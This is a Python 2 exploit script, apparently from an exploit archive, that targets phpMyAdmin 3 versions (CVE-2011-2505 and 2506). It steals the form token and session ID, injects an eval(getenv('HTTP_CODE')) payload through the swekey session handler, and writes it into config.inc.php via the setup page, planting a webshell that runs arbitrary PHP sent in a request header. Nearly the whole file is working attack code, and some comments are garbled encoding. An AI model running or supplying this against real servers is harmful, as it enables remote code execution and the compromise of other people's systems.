/exploits/php/webapps/17510.py

#!/usr/bin/env python

# coding=utf-8

# pma3 - phpMyAdmin3 remote code execute exploit

# Author: wofeiwo<wofeiwo@80sec.com>

# Thx Superhei

# Tested on: 3.1.1, 3.2.1, 3.4.3

# CVE: CVE-2011-2505, CVE-2011-2506

# Date: 2011-07-08

# Have fun, DO *NOT* USE IT TO DO BAD THING.

################################################



# Requirements: 1. "config" directory must created&writeable in pma directory.

#               2. session.auto_start = 1 in php.ini configuration.





import os,sys,urllib2,re



def usage(program):

    print "PMA3 (Version below 3.3.10.2 and 3.4.3.1) remote code

execute exploit"

    print "Usage: %s <PMA_url>" % program

    print "Example: %s http://www.test.com/phpMyAdmin" % program

    sys.exit(0)



def main(args):

    try:

        if len(args) < 2:

            usage(args[0])



        if args[1][-1] == "/":

            args[1] = args[1][:-1]



        # ��һ������ȡtoken��sessionid��sessionid��phpMyAdmin��ֵ��һ�µ�

        print "[+] Trying get form token&session_id.."

        content = urllib2.urlopen(args[1]+"/index.php").read()

        r1 = re.findall("token=(\w{32})", content)

        r2 = re.findall("phpMyAdmin=(\w{32,40})", content)



        if not r1:

            r1 = re.findall("token\" value=\"(\w{32})\"", content)

        if not r2:

            r2 = re.findall("phpMyAdmin\" value=\"(\w{32,40})\"", content)

        if len(r1) < 1 or len(r2) < 1:

            print "[-] Cannot find form token and session id...exit."

            sys.exit(-1)



        token = r1[0]

        sessionid = r2[0]

        print "[+] Token: %s , SessionID: %s" % (token, sessionid)



         # �ڶ�����ͨ��swekey.auth.lib.php����$_SESSION��ֵ

        print "[+] Trying to insert payload in $_SESSION.."

        uri = "/libraries/auth/swekey/swekey.auth.lib.php?session_to_unset=HelloThere&_SESSION[ConfigFile0][Servers][*/eval(getenv('HTTP_CODE'));/*][host]=Hacked+By+PMA&_SESSION[ConfigFile][Servers][*/eval(getenv('HTTP_CODE'));/*][host]=Hacked+By+PMA"

        url = args[1]+uri



        opener = urllib2.build_opener()

        opener.addheaders.append(('Cookie', 'phpMyAdmin=%s;

pma_lang=en; pma_mcrypt_iv=ILXfl5RoJxQ%%3D; PHPSESSID=%s;' %

(sessionid, sessionid)))

        urllib2.install_opener(opener)

        urllib2.urlopen(url)



        # ����setup��ȡshell

        print "[+] Trying get webshell.."

        postdata =

"phpMyAdmin=%s&tab_hash=&token=%s&check_page_refresh=&DefaultLang=en&ServerDefault=0&eol=unix&submit_save=Save"

% (sessionid, token)

        url = args[1]+"/setup/config.php"



        # print "[+]Postdata: %s" % postdata

        urllib2.urlopen(url, postdata)

        print "[+] All done, pray for your lucky!"



        # ���IJ����������shell

        url = args[1]+"/config/config.inc.php"

        opener.addheaders.append(('Code', 'phpinfo();'))

        urllib2.install_opener(opener)

        print "[+] Trying connect shell: %s" % url

        result = re.findall("System \</td\>\<td

class=\"v\"\>(.*)\</td\>\</tr\>", urllib2.urlopen(url).read())

        if len(result) == 1:

            print "[+] Lucky u! System info: %s"  % result[0]

            print "[+] Shellcode is: eval(getenv('HTTP_CODE'));"



        else:

            print "[-] Cannot get webshell."



    except Exception, e:

        print e



if __name__ == "__main__" : main(sys.argv)